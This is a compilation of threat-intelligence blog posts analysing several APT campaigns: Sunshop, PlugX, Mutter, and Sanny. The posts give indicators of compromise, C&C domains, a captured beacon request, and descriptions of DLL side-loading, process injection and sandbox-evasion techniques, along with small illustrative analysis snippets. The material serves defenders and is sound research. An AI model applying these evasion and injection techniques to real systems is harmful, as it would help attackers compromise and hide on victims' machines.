One very common technique used by malware authors to exploit Java is to disable the security manager. Once the security manager has been disabled, the next steps may involve loading a malicious executable or connecting to a malicious website.

One of the most common calls that appears in a malicious JAR to disable the security manager is System.setSecurityManager(null). Besides making a direct call to setSecurityManager, there are other approaches, for example locating the address of java/lang/System and using it to disable the security manager. Basically, once the address has been located, memory is traversed until the address of getSecurityManager() is found. The wrmMem() function is then called and null is written directly to the address of getSecurityManager(), thus disabling the security manager.

For more information regarding the pseudo code and exploitation of a vulnerability to disable the security manager, we encourage our readers to refer to the recently published article in the June 2013 issue of Virus Bulletin.


Ready for Summer: The Sunshop Campaign

FireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer zero-day, CVE-2013-1347, as well as the recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign appears to have affected a number of victims, based on the use of the Internet Explorer zero-day as well as the amount of traffic observed making requests to the exploit server. This attack was likely executed by an actor we have named the 'Sunshop Group'. This actor was also responsible for the 2010 compromise of the Nobel Peace Prize website, which leveraged a zero-day in Mozilla Firefox.

Impacted Sites

The campaign in question compromised a number of strategic websites including:

• Multiple Korean military and strategy think tanks

• A Uyghur news and discussion forum

• A science and technology policy journal

• A website for evangelical students

A call to a malicious javascript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised websites.

The Exploit Server

If a visitor to one of these compromised websites was running Internet Explorer 8.0, the malicious javascript would redirect them to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. Any other visitors were redirected to a page that downloaded two malicious jars.

if(browser=="Microsoft Internet Explorer" && trim_Version=="MSIE8.0" && window.navigator.userLanguage.indexOf("en")>-1)











Dropped Payloads and C&C Infrastructure

The Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at hk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and control server at dns[.]homesvr[.]tk.

The Java exploits were packaged as two different jar files. One jar file had an MD5 of f4bee1e845137531f18c226d118e06d7 and exploited CVE-2013-2423. The second jar file had an MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited CVE-2013-1493.

The jar that exploited CVE-2013-2423 dropped a 9002 RAT with an MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT connected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped a 9002 RAT with an MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at ssl[.]homesvr[.]tk.

All of the above 9002 command and control domains resolved to the same IP address. We previously discussed the extensive use of this RAT in other advanced persistent threat (APT) campaigns here.

Related Infrastructure

After further research into this IP address with our friends at Mandiant, we uncovered a Briba sample with the MD5 6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to it. As seen in this malwr report, the command and control domain nameserver1[.]zapto[.]org resolved to the same IP address on 2013-05-07. This Briba sample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:

POST /index000001021.asp HTTP/1.1

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)


Connection: Keep-Alive

Content-Type: text/html

Content-Length: 000041

For a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.

The exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had an MD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5 2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at 9ijhh45[.]zapto[.]org over port 443 using a password of ‘ult4life’. This domain resolved to the same IP between April 2nd and 8th.


The Sunshop Group has utilized the same tactics described above in previous targeted attack campaigns. These tactics include the use of zero-day exploits and strategic web compromises, as well as Briba malware.

One of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee's website in 2010. This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.

Another publicly documented attack exploited a Flash zero-day and can be found here. Mila at the Contagio Blog posted additional information on this attack here. This attack dropped the same Briba payload discussed above.

FireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.


CVE             Exploit hash                      Payload hash                      Malware family  C&C Host                       C&C IP
CVE-2013-1347   fb24c49299b197e1b56a1a51430aea26  b0ef2ab86f160aa416184c09df8388fe  9002            dns[.]homesvr[.]tk
CVE-2013-2423   f4bee1e845137531f18c226d118e06d7  d99ed31af1e0ad6fb5bf0f116063e91f  9002            asp[.]homesvr[.]linkpc[.]net
CVE-2013-1493   3fbb7321d8610c6e2d990bb25ce34bec  42bd5e7e8f74c15873ff0f4a9ce974cd  9002            ssl[.]homesvr[.]tk
Unknown         Unknown                           6fe0f6e68cd9cc6ed7e100e7b3626665  Briba           nameserver1[.]zapto[.]org
CVE-2013-1493   51aff823274e9d12b1a9a4bbbaf8ce00  2B6605B89EAD179710565D1C2B614665  Poison Ivy      9ijhh45[.]zapto[.]org

Targeted Attack Trend Alert: PlugX the Old Dog With a New Trick

FireEye Labs has discovered a targeted attack on Chinese political rights activists. The targets appear to be members of social groups involved in the political rights movement in China. The email surfaced after the attention Beijing received during the 12th National People's Congress and the 12th National Committee of the Chinese People's Political Consultative Conference, at which a new core of leadership of the Chinese government was elected to determine the future of China's five-year development plan [1].

The email contains a weaponized attachment that utilizes the Windows Office CVE-2012-0158 exploit to drop the benign payload components and decoy document. The Remote Access Tool (RAT) PlugX itself is known as a combination of benign files that build the malicious execution. The Microsoft file OInfoP11.exe, also known as “Office Data Provider for WBEM”, is a certified file found in the National Software Reference Library (NIST) and is a component of the Microsoft Office 2003 suite. To endpoint protection that performs integrity checking, this file would be deemed a valid, clean file. In Windows 7+ distributions, svchost.exe will require user interaction by displaying a UAC prompt, but only if UAC is enabled; in Windows XP distributions, this attack does not require user interaction. The major problem is that this file is subject to DLL side-loading. In previous cases, PlugX has utilized similarly side-loading-prone files such as a McAfee binary called mcvsmap.exe [2], Intel's hkcmd.exe [3], and NVIDIA's NvSmart.exe [4]. In this case, OInfoP11.exe loads a DLL file named OInfo11.ocx (a payload loader posing as an ActiveX DLL) that decompresses and decrypts the malicious payload OInfo11.ISO. This technique can be used to evade endpoint security solutions that rely on binary signing, and traditional anti-virus (AV) solutions will have a hard time identifying the encrypted and compressed payload. At the time of writing, only 1 of 46 AV vendors detects the OInfo11.ocx file.

The diagram in figure 1 shows the behavior and relationship of these files.

Figure 1: Attack Diagram


In Figure 2, the targeted email advertises a suffrage movement seminar event. Figure 3 shows the contents of the Google form link, which contains the same information as the email. In Figure 4, the decoy document contains the details of the particular seminar section mentioned in the Google form link.


Figure 2: Original Email

Below is the English translation of the email in figure 2.

Li Ping

Figure 3: Google Form

Decoy Document

Figure 4: Decoy Document

Below is the translation to the document shown above.

The seminar

Attack Analysis

The XLS file (1146fdd6b579ac7144ff575d4d4fa28d) utilizes the CVE-2012-0158 Windows Office exploit to drop the “ews.exe” payload and the decoy document shown in Figure 4. This payload extracts the Microsoft file OINFOP11.exe, the benign DLL OInfo11.ocx, and encoded and compressed shellcode sections from OInfo11.ISO. OINFOP11.exe will load OInfo11.ocx as a DLL, which once loaded will decompress (using RtlDecompressBuffer) and decrypt OInfo11.ISO to run in memory. The malicious payload is never dropped to the file system and is therefore not seen by file-system-based anti-virus detectors. Figure 5 shows a high-level view of the relationship of the dropped files.


Figure 5: Payload Relationship

Summary of Dropped Files

Name           MD5                               Locations                               Type         Encoded/Encrypted  Compressed
Ews.exe        721cca40df0f7eab5b5cb069ee8fda9d  %TEMP%                                  Exe
OINFOP11.EXE   a31cad2960a660cb558b32ba7236b49e  %TEMP%\RarSFX0\, %ALLUSERSPROFILE%\SXS\  Exe (clean)
OInfo11.ocx    b355dedbabb145bbf8dd367adac4f8c5  %TEMP%\RarSFX0\, %ALLUSERSPROFILE%\SXS\  Binary File  Yes
OInfo11.ISO    128e3fc5ffba06abdd3edab2aff3753f  %TEMP%\RarSFX0\, %ALLUSERSPROFILE%\SXS\  Binary File  Yes                Yes

Exploit Details

This malware uses CVE-2012-0158 to drop the payload from the section shown in Figure 6.


Figure 6: Exploit Payload Section

Shellcode can be found in the first few bytes of this section. Figure 7 shows the disassembly of the code found at the 0x1de0b offset shown in figure 6.


Figure 7: Payload Shellcode

Campaign Characteristics

OInfoP11.exe is a valid Microsoft file and its certificate is shown in figure 8.


Figure 8: Signature Usage

When OInfop11.exe is called with the arguments "C:\Documents and Settings\All Users\SxS\OINFOP11.EXE" 200 0, it begins loading the file OInfo11.ocx.


Figure 10: Loader Entrypoint

The arrow shows the exact jump point where execution enters the shellcode that decompresses and decrypts the ISO file.


Figure 11: Shellcode Example

This is an example of the memory space of the loaded benign DLL OInfo11.ocx. OInfo11.ocx is essentially a loader; this section decompresses and decrypts the malicious payload in memory.


Figure 12: Decryption of the ISO file

This is the decryption loop used throughout the sample. In this instance, it is used to decrypt the ISO shellcode in memory.
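The sample's actual decryption routine is not reproduced in this post. As an illustration only, the sketch below shows the general shape of the kind of simple, repeated decryption loop pictured in figure 12; the single-byte XOR key and the algorithm itself are assumptions, not details recovered from the sample.

```python
def xor_decrypt(buf: bytes, key: int) -> bytes:
    """Decrypt a buffer with a single-byte XOR key.

    Stand-in for the sample's loop: the real algorithm and key schedule
    are not documented here, so this is purely illustrative.
    """
    return bytes(b ^ key for b in buf)

# XOR is its own inverse, so applying the loop twice recovers the input.
plaintext = b"shellcode stub"
ciphertext = xor_decrypt(plaintext, 0x5A)
assert xor_decrypt(ciphertext, 0x5A) == plaintext
```

Loops like this are easy to spot in a disassembler precisely because they touch every byte of a buffer with the same cheap arithmetic operation.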


Figure 13: DLL location in memory

This is an example of the complete malicious DLL address space in memory.


Artifacts to watch for:

Mutex: \BaseNamedObjects\oleacc-msaa-loaded

Registry keys added:
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Security\User Agent\Post Platform

Registry value set:
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000

Folders and files hidden: %ALLUSERSPROFILE%\SXS\



The DLL injects code into svchost.exe by allocating memory with VirtualAllocEx, then uses WriteProcessMemory to write into the memory space of svchost.exe. The thread is then resumed to run the injected code. This injection process is used for both svchost.exe and msiexec.exe. When svchost.exe spawns msiexec.exe, it calls CreateEnvironmentBlock and CreateProcessAsUser so that the svchost service can launch a user session.

Keylogging Activity

The malware creates a keylogging file in %ALLUSERSPROFILE%\SXS\ as NvSmart.hlp. Below is an example of the content of this file.


Proxy Establishment

This sample can communicate using ICMP, UDP, HTTP and TCP. In this situation the sample is using the string Protocol:[ TCP], Host: [], Proxy: [0::0::] to establish the proxy for the C&C communication.


Figure 14: Communication Options
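The bracketed configuration string quoted above has a regular structure, so a small parser can recover the transport settings from it. The field semantics (protocol selection, host, proxy) are inferred from the captured string, and the parser below is our own sketch, not code from the sample.

```python
import re

def parse_comm_config(s: str) -> dict:
    """Parse a bracketed key/value string like the one the sample uses
    to select its C&C transport. Format inferred from the captured
    string; not taken from the malware's own code."""
    fields = re.findall(r"(\w+):\s*\[\s*([^\]]*?)\s*\]", s)
    return dict(fields)

cfg = parse_comm_config("Protocol:[ TCP], Host: [], Proxy: [0::0::]")
# cfg -> {'Protocol': 'TCP', 'Host': '', 'Proxy': '0::0::'}
```

Extracting these fields from memory dumps or network captures makes it straightforward to tell which of the sample's transports (ICMP, UDP, HTTP, TCP) a given infection is configured to use.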

Modes of Operation Overview

The table below outlines some of the functionality that this variant uses. The options have not changed, so this table serves as a refresher. Figure 15 shows an example of how these functions are called by the sample.

Mode | Description
Disk | Access disk drives to modify files
Nethood | List shares
Netstat | List TCP/UDP connections
Option | Send system commands to the workstation, such as screen lock
PortMap | Port mapping
Process | Modify the state of processes
RegEdit | Modify registry keys
Service | Modify services
Shell | Communicate with the C&C server through the established named pipe
SQL | SQL database queries
Telnet | Start a telnet server on the victim


Figure 15: Functionality Example

C&C Details and Communication

In figure 16, the sample is communicating with its C&C server over port 90. The C&C node is down in this case, but the communication is dynamic, non-HTTP communication. An example of the callback content is shown in figure 17. This sample will also try to communicate laterally with other instances in the same network. An example of this traffic and its content can be seen in figures 18 and 19.


Figure 16: PCAP of C&C communication


Figure 17: Callback Traffic


Figure 18: UDP Beacon


Figure 19: UDP packet content

Whois Information on the IP

inetnum: -

netname: NEWTT-AS-AP

descr: Wharf T&T Limited

descr: 11/F, Telecom Tower,

descr: Wharf T&T Square, 123 Hoi Bun Road

descr: Kwun Tong, Kowloon

country: HK

admin-c: EN62-AP

tech-c: BW128-AP

mnt-by: APNIC-HM

mnt-lower: MAINT-HK-NEWTT

mnt-routes: MAINT-HK-NEWTT

mnt-irt: IRT-NEWTT-HK


remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

remarks: This object can only be updated by APNIC hostmasters.

remarks: To update this object, please contact APNIC

remarks: hostmasters and include your organisation's account

remarks: name in the subject line.

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

changed: 20120725

source: APNIC

person: Eric Ng

nic-hdl: EN62-AP

remarks: please report spam or abuse to



address: 11/F Telecom Tower, Wharf T&T Square

address: 123 Hoi Bun Road, Kwun Tong,

phone: +852-2112-2653

fax-no: +852-2112-7883

country: HK

changed: 20070716

mnt-by: MAINT-NEW

source: APNIC

person: Benson Wong

nic-hdl: BW128-AP


address: 5/F, Harbour City, Kowloon,

address: Hong Kong

phone: +852-21122651

fax-no: +852-21127883

country: HK

changed: 20070420


source: APNIC

I want to thank the FireEye Labs Team.





Malware Callbacks

Today we released our first-ever analysis of malware callbacks.

FireEye monitored more than 12 million malware communications seeking instructions—or callbacks—across hundreds of thousands of infected enterprise hosts, capturing details of advanced attacks as well as more generic varieties during the course of 2012. Callback activity reveals a great deal about an attacker’s intentions, interests and geographic location. Cyber attacks are a widespread global activity. We’ve built interactive maps that highlight the presence of malware globally:

Our key findings:

  1. Malware has become a multinational activity. Over the past year, callbacks were sent to command and control (CnC) servers in 184 countries—a 42 percent increase when compared to 130 countries in 2010.
  2. Two key regions stand out as hotspots driving advanced cyber attacks: Asia and Eastern Europe. Looking at the average callbacks per company by country, the Asian nations of China, South Korea, India, Japan, and Hong Kong accounted for 24 percent. Not far behind, the Eastern European countries of Russia, Poland, Romania, Ukraine, Kazakhstan, and Latvia comprised 22 percent. (North America represented 44 percent, but this is due to CnC servers residing in the United States to help attackers with evasion.)
  3. The majority of Advanced Persistent Threat (APT) callback activities are associated with APT tools that are made in China or that originated from Chinese hacker groups. By mapping the DNA of known APT malware families against callbacks, FireEye Malware Intelligence Lab discovered that the majority of APT callback activities—89 percent—are associated with APT tools that are made in China or that originated from Chinese hacker groups. The main tool is Gh0st RAT.
  4. Attackers are increasingly sending initial callbacks to servers within the same nation in which the target resides. To improve evasion, hackers are increasingly placing CnC servers within target nations. At the same time, this fact gives a strong indicator of which countries are most interesting to attackers.
  5. Technology organizations are experiencing the highest rate of APT callback activity. With a high volume of intellectual property, technology firms are natural targets for attackers and are experiencing heavy APT malware activity.
  6. For APT attacks, CnC servers were hosted in the United States 66 percent of the time, a strong indicator that the U.S. is still the top target country for attacks. As previously mentioned, attackers increasingly put CnC servers in the target country to help avoid detection. With such a high proportion of CnC servers, the U.S. is subject to the highest rate of malware attacks by a wide margin. This is likely due to the very high concentration of intellectual property and digitized data that resides in the U.S.
  7. Techniques for disguising callback communications are evolving. To evade detection, CnC servers are leveraging social networking sites like Facebook and Twitter for communicating with infected machines. Also, to mask exfiltrated content, attackers embed information inside common files, such as JPGs, to give network scanning tools the impression of normal traffic.
  8. Attack patterns vary substantially globally:




    1. South Korean firms experience the highest level of callback communications per organization. Due to a robust internet infrastructure, South Korea has emerged as a fertile location for cybercriminals to host their CnC infrastructure. For example, FireEye found that callbacks from technology firms are most likely to go to South Korea.
    2. In Japan, 87 percent of callbacks originated and stayed in country. This may give an indication of the high value of Japanese intellectual property.
    3. In Canada, 99 percent of callbacks exited the country; in the U.K., exit rates were 90 percent. High exit rates indicate that attackers in these countries are unconcerned about detection and pursue low-hanging fruit opportunistically.





The Mutter Backdoor: Operation Beebus with New Targets

FireEye Labs has observed a series of related attacks against a dozen organizations in the aerospace, defense, and telecommunications industries, as well as government agencies, located in the United States and India. These attacks have been occurring since at least December 2011. In at least one case, a decoy document included in the attack contained content focused on Pakistani military advancements in unmanned vehicle, or “drone,” technology.

Technically, these attacks exploited previously discovered vulnerabilities via document files delivered by email in order to plant a previously unknown backdoor onto victim systems. The malware used in these attacks employs a number of interesting techniques to “hide in plain sight” and to evade dynamic malware analysis systems. Similar to, though not based on, the attacks we saw in South Korea, the malware tries to stay inactive as long as possible to evade dynamic analysis detection methods.

We have linked these attacks back to Operation Beebus through the C&C infrastructure along with the similar targets and timeline observed. Although some of the targets of these attacks overlapped with Beebus targets, many new targets were discovered, including some in India. As we uncover more targets related to these attacks, we are seeing a common link between them: unmanned vehicles, also known as “drones.” The set of targets covers all aspects of unmanned vehicles (land, air, and sea), from research to design to manufacturing of the vehicles and their various subsystems. Other related malware with a similar set of targets has been discovered through the same C&C infrastructure; including those targets brings the total to more than 20 as of this writing. These targets include some in academia which have received military funding for their research projects relating to unmanned vehicles.


All of the attacks we have observed occurred through document exploits attacking known vulnerabilities. We have seen RTF and XLS files used for delivery. Searching the internet for the author and document names yields information regarding South Asia politics. Although all of the document exploits we have analyzed drop a decoy document, most of them are either empty or filled with unreadable data with two exceptions.


One is an article about Pakistan’s indigenous UAV industry which is attributed to author Aditi Malhotra, an Indian writer and Associate Fellow at the Centre for Land Warfare Studies (CLAWS) in New Delhi. Although we are not sure this particular work is actually hers, we did find a reference to a similarly named article “Pakistan’s UAV programme: Ambitious, with some friendly help.” Unfortunately, this document was not available. Other works of hers on a similar note include “India’s Silence on Chinese Incursions” and “China and Pakistan: Dangerous Liaisons.”

The other decoy document is contact info for an American with a military-provided email address from Joint Base Andrews in Maryland, but with a physical address in Pakistan, titled “Family Planning Association of Base (FPAB).” It looks like the authors took the “Family Planning Association of Bangladesh” and combined it with “Joint Base Andrews.” The title of the email field is “FPAP Email”; “FPAP” could stand for “Family Planning Association of Pakistan.” Ultimately, we could make no sense of this information.

The Mutter Backdoor

Two different versions of the same backdoor were used in all of these attacks. In every case we have found, the main component is a DLL dropped by an executable compiled minutes after the DLL. The dropper shares the same decoding functions as the DLL and performs some modifications on the DLL that will be described later. There was one unique case we found where the initial dropper was a self-extracting archive that utilizes Visual Basic and batch scripts to download and install the DLL instead of extracting it from a resource.

Mutter is HTTP proxy aware, and attempts to determine if a proxy is required and what the proxy details are if necessary. It uses to perform such tests. It uses HTTP to communicate with the C&C server and expects an encoded string between a pair of <p> tags in the response. The URL in the request has one parameter, “i”, which is set to an encoded representation of a string that follows this format:

<Mutter version#>-<campaign marker?>-<victim hostname>-<victim IP address>

We are not certain about the second part of this string; it may be either a campaign marker or an extension of the version number. In all our cases, it is set to either “SN0” or “SN1”. Actual strings are shared in the appendix information at the end of this blog.


This HTTP request pictured in the screenshot is from the older version of Mutter. The newer versions of Mutter have a very similar HTTP request, but with the Host and Connection headers swapped.

The response string is decoded and parsed for the following commands:

“m”: executes a shell command

“u”: uploads a file to the victim (downloads a file from the victim’s perspective)

“d”: downloads a file to the attacker (uploads a file from the victim’s perspective)

“R”: removes the auto-run registry value

These commands are referenced in the code in this order, and when said aloud it sounds like “mutter”, hence the name chosen for the malware. In the earlier version of this backdoor, the “d” command was referenced, but the code had not been implemented yet. In both versions, another command string “f” appears along with the others, but is not referenced in the code. This perhaps indicates a future feature to be added.
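The command handling described above amounts to a tiny dispatch table. The sketch below mirrors that structure; only the command letters ("m", "u", "d", "R", and the unimplemented "f") come from the analysis, while the handler bodies are placeholders.

```python
def dispatch(command: str, arg: str, log: list) -> None:
    """Minimal sketch of Mutter's command dispatch. Handlers only log
    what the real backdoor would do; they are illustrative placeholders."""
    handlers = {
        "m": lambda a: log.append(f"exec shell: {a}"),
        "u": lambda a: log.append(f"download file to victim: {a}"),
        "d": lambda a: log.append(f"upload file to attacker: {a}"),
        "R": lambda a: log.append("remove auto-run registry value"),
    }
    handler = handlers.get(command)
    if handler:  # "f" and unknown commands fall through silently
        handler(arg)

log = []
dispatch("m", "whoami", log)
dispatch("f", "unused", log)  # string present in the binary, no code behind it
assert log == ["exec shell: whoami"]
```

Recovering this kind of table from a sample is useful both for naming the family (as happened here) and for writing emulators that exercise each command path safely.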

This malware employs several interesting evasion techniques. For starters, it employs several “hide in plain sight” techniques common to malware used in targeted attacks. It specifies fake properties, pretending to be Google or Microsoft.



This brings us to the next “hide in plain sight” tactic we noticed. Observe the size of the file above: a whopping 41 megabytes. With rare exceptions, malware is typically small, usually no larger than a few hundred kilobytes. When an investigator comes across a file megabytes in size, they may be discouraged from taking a closer look. Interestingly, the original size of this particular DLL is around 160 kilobytes, although the PE headers already indicate its future size as shown below. The dropper will decode this DLL from its resource section, drop it onto the victim’s system, and proceed to fill its resource section with randomly generated data. This has the useful side effect of giving each DLL a unique hash, making it more difficult to identify.
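One way to triage for this inflation trick is to check whether a suspiciously large file ends in high-entropy (near-random) data, since the padding the dropper writes is randomly generated. The heuristic and thresholds below are our own illustrative choices, not derived from the sample.

```python
import math
import os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the buffer; random data approaches 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def looks_padded(blob: bytes, tail: int = 4096, threshold: float = 7.5) -> bool:
    """Heuristic (ours, not the sample's): a file over ~1 MB whose tail
    is near-random may have been inflated with junk to discourage
    inspection and to randomize its hash."""
    return len(blob) > 1_000_000 and shannon_entropy(blob[-tail:]) > threshold

# A stand-in for an inflated DLL: small real content, megabytes of random fill.
fake = b"MZ" + b"\x00" * 1000 + os.urandom(2_000_000)
assert looks_padded(fake)
assert not looks_padded(b"MZ small file")
```

Comparing the size declared in the PE headers against the size of meaningful content, as the investigators did here, is the more precise follow-up once the heuristic flags a file.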


In addition to these hiding techniques, this malware also appears to employ techniques to evade dynamic malware analysis systems. This has been an ongoing trend in malware development that we and others have observed several times in the past. The malware author adds code to delay execution of the important functionality for some period of time, the idea being that if the malware stalls long enough, the dynamic malware analysis system will give up on it and pass it off as benign. This malware has two routines for which we could find no purpose other than such evasion.

One routine is a function that simply runs a series of loops, incrementing a local variable over and over, thousands of times. It ultimately disregards the final value of this variable, meaning that the function serves no purpose. This function is called many times throughout the rest of the code. It may have been implemented for the purpose of wasting time.

Another routine seems to have a similar goal, but with a different approach. This time, a loop is implemented with a call to sleep for a short time. This loop occurs many times, and each time it will also allocate a chunk of memory on the heap, performing math operations on it and printing it to the console over and over again. Keep in mind that this memory is not initialized to any value and is not used for anything later in the code, it is essentially junk memory. This seems to be another means of wasting time.
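The shape of that second routine, and a common sandbox countermeasure against it, can be sketched as follows. The loop body is a simplified stand-in for the sample's junk work, and the sleep-hooking trick is a generic analysis technique, not something the sample itself contains.

```python
import time

def stalling_loop(iterations: int) -> None:
    """Simplified shape of the delay routine: repeated short sleeps plus
    throwaway work whose result is never used."""
    junk = 0
    for _ in range(iterations):
        time.sleep(0.01)
        junk += 1  # result discarded; exists only to burn wall-clock time

# Sandbox countermeasure: replace sleep with a no-op that records how
# much time the sample *asked* to waste, so analysis is not actually delayed.
requested = []
real_sleep, time.sleep = time.sleep, lambda s: requested.append(s)
try:
    stalling_loop(100)
finally:
    time.sleep = real_sleep

assert abs(sum(requested) - 1.0) < 1e-6  # 100 sleeps of 0.01s requested
```

Dynamic analysis systems use exactly this kind of sleep acceleration so that stalling loops expend their delay instantly instead of outlasting the analysis window.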

We detect this malware as Backdoor.APT.NS01.

C&C Details

Most of the domains registered for C&C use in this campaign were registered through a free dynamic DNS provider. Dynamic DNS is a popular option for domain registration since it is free and provides a convenient level of anonymity. Looking at passive DNS records for other domains pointing to the IP addresses used to host the C&C services turned up many other related domains. Various subdomains of the domain have pointed to several IPs pointed to by the Mutter domains. This is interesting because this is the name of the folder created by Mutter on victims’ systems. Furthermore, this domain is not a publicly available dynamic DNS provider, and the email address used to register this domain is  We cannot be certain, but this name could be a reference to Binalakshmi Nepram, a writer-activist born in Manipur, India, who is fighting for disarmament. This fits the theme we have observed from other clues left behind in decoy documents. Another domain that is indirectly linked is with this interesting registration information.
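The passive DNS pivot used here, grouping domains by the IPs they have resolved to and flagging shared infrastructure, can be sketched in a few lines. The domains and IPs below are made-up placeholders; the real indicators from the investigation are not reproduced.

```python
from collections import defaultdict

# Hypothetical passive DNS records as (domain, resolved_ip) pairs.
pdns = [
    ("evil-a.example", "203.0.113.10"),
    ("evil-b.example", "203.0.113.10"),
    ("unrelated.example", "198.51.100.7"),
]

by_ip: dict = defaultdict(set)
for domain, ip in pdns:
    by_ip[ip].add(domain)

# IPs shared by more than one domain are pivot points worth investigating:
# new domains co-hosted with known-bad ones inherit suspicion.
pivots = {ip: doms for ip, doms in by_ip.items() if len(doms) > 1}
assert pivots == {"203.0.113.10": {"evil-a.example", "evil-b.example"}}
```

This is the same reasoning that connected the Mutter domains to additional infrastructure above: shared hosting plus corroborating details (folder names, registrant emails) turns co-location into an attribution lead.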


Agni is the Hindu god of fire. Notice the combination of India and China references here. The email address used to register this domain was also referenced in a Chinese developer forum, but nothing else interesting was discovered about it.

The IP addresses hosting the C&C services are scattered all over the world and are believed to be compromised hosts.

Attackers, Targets, and Timeline

The attackers appear to be the well known and prolific “Comment Group” as we had stated in our previous blog on Operation Beebus. This link was made through finding several overlapping IP addresses used by Mutter and Beebus such as the following.


The theme of these attacks appears to be South Asia politics. The hints scattered throughout the documents and domain registrant information were laid on pretty thick, which is something to be wary of. The only legible, sensible decoy document observed so far is revealing of the interests of at least one of the targets of this campaign: namely, the military threat of Pakistan against India and its growing relationships with other countries, including China. The particular topic of this decoy document also appears to be a common link between most of the targets we have seen: unmanned vehicles.

The timeline below outlines the events specific to Mutter that we had visibility into. This campaign is still ongoing with Mutter callbacks being made to this day.




Exploit Document MD5 | Exploit | Exploit Document Filename | Decoy Document Title | Decoy Document Author | Decoy Document Last Modified | First Seen
b5f4a9aac67b53762ed98fafd067c803 | CVE-2012-0158 | NA | Pakistan’s Indigenous UAV industry | GOPAL GURUNG | Aug 2nd 2010 | Aug 27th 2012
92643bfa4121f1960c43c78a3d53568b | CVE-2008-3005 | 2012_3_12.xls | NA | NA | Jan 26th 2003 | Mar 22nd 2012
4d5a235048e94579aab0062057296186 | CVE-2010-3333 | Change of Address.doc | Tele: 2619 4428 | kdly | Dec 6th 2011 | Dec 7th 2011
589f10e2efdd98bfbdc34f247b6a347f | CVE-2010-3333 | Urgent message.doc | NA | Administrator | Feb 2nd 2003 | Mar 2nd 2012
fd9777c90abb4b758b4aff29cfd68b98 | CVE-2012-0158 | NA | Tariq Masud | Haroon-ur-Rashid/Administrator | Sept 11 2012 | 


Dropper Filename | Dropper MD5 | DLL Filename | Mutex | C&C Host | Decoded “i” Value | Compile Time
update.exe | 725fc0d7a8e7b9e01a83111619744b6f | msdsp.dll | 654234576804d | | V0.9.6Y-SN1-<hostname>-<IP address> | Aug 28th 2012
igfxtray.exe | 681a014e9d221c1003c54a2a9a1d9df8 | winsups.dll | mqe45tex13fw14op0 | | V0.7-SN0-<hostname>-<IP address> | Aug 28th 2012
NA | 6aac76fc8309e29ea8a7afea48ae9b29 | msdsp.dll | 654234576804d | | V0.9.6X-SN1-<hostname>-<IP address> | Aug 12th 2012
ctfmon.exe | d5640ae049779bbb068eff08616adb95 | winsups.dll | mqe45tex13fw14op0 | | V0.7-SN0-<hostname>-<IP address> | Aug 2nd 2010
igfxtray.exe | 681a014e9d221c1003c54a2a9a1d9df8 | winsups.dll | mqe45tex13fw14op0 | | V0.7-SN0-<hostname>-<IP address> | Aug 2nd 2010
igfxpers.exe | 06d5dddd4c349f666d84a91d6edc4f8d | msdsp.dll | NA | | NA | 

Thanks to Darien Kindlund for his assistance in research.

Sanny CnC Backend Disabled

We recently encountered in the wild another sample related to the Sanny APT. For readers who are not familiar with the Sanny APT, please refer to our previous blog for the background. The sample was using the same lure text and CVE-2012-0158 vulnerability. However, this time it was using a different board, named "ecowas_1," as compared to "kbaksan_1," which was employed previously. The following are the CnC URLs to list stolen data entries extracted from the samples:

New    -->      hxxp://

Previous -->       hxxp://

Based on the timestamps and other indicators, we believe that both samples were created and deployed at the same time. The attacker probably used different boards/DBs to divide victims, ensuring that if one goes down, the stolen data keeps flowing from the remaining ones.

We have been in touch with the Korea Internet & Security Agency (KISA) regarding the Sanny APT, and with their help the CnC boards ecowas_1 and kbaksan_1 have been shut down (they no longer serve any content). The following screenshot shows the response if you access the ecowas_1 board.

Figure 1: Response from the ecowas_1 board

The text in figure 1 roughly translates to “Error: Blackout.”

We want to thank KISA for collaborating with FireEye on this important case. Both FireEye and KISA are monitoring this threat and will let you know if there is any new update.